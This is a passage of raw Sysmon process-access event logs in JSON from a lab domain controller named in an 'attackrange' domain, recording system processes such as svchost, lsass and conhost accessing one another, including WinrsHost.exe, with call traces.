C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.420\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nTargetProcessId: 1256\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.420","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","TargetProcessId":"1256","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.436\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.436","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010F4B40600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.436\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.436","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010F4B40600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.452\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1772\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.452","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1772","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010F4B40600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.